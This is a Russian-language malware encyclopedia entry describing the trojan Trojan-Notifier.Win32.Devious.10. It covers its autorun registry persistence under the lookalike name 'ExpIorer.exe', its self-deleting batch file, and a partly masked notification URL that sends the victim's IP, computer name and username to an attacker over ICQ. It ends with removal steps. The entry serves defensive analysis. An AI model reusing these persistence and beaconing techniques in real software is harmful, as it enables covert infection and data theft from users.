Trojan-Notifier.Win32.Devious.10

Материал из Total Malware Info

Trojan-Notifier.Win32.Devious.10 Троянская программа. Имеет размер 4 608 байта. Является приложением Windows (PE EXE-файл). Написана на Ассемблере.

Инсталляция

Для автоматического запуска при следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"ExpIorer.exe"="ExpIorer.exe"

Деструктивная активность

При запуске троянец проверяет наличие файла "Netstat.exe" в своем рабочем каталоге, если такого файла не существует, он копирует свое тело в каталог Windows:

%WinDir%\ExpIorer.exe

Далее создается командный файл, который запускается и удаляет тело троянца:

%Temp%\DelUS.bat

Если троянец запущен из каталога "%Windir%", он ожидает соединения с Интернетом, проверяя его наличие каждые 5 секунд. При наличии соединения троянец открывает URL специального вида:

http://wwp*****com/scripts/WWPMsg.dll?from=Victim name&fromemail= &subject=-=EES=- Smoke Notification &body=I am online...pls hack me :)&to=118494733&submit=send

Открытие данного URL приводит к тому, что с зараженного компьютера отправляется сообщение с IP-адресом, именем компьютера и именем пользователя злоумышленнику на ICQ.

Рекомендации по удалению

1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
2. Завершить троянский процесс ExpIorer.exe
3. Удалить файл

%WinDir%\ExpIorer.exe

4. Удалить ключ реестра

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ExpIorer.exe"="ExpIorer.exe"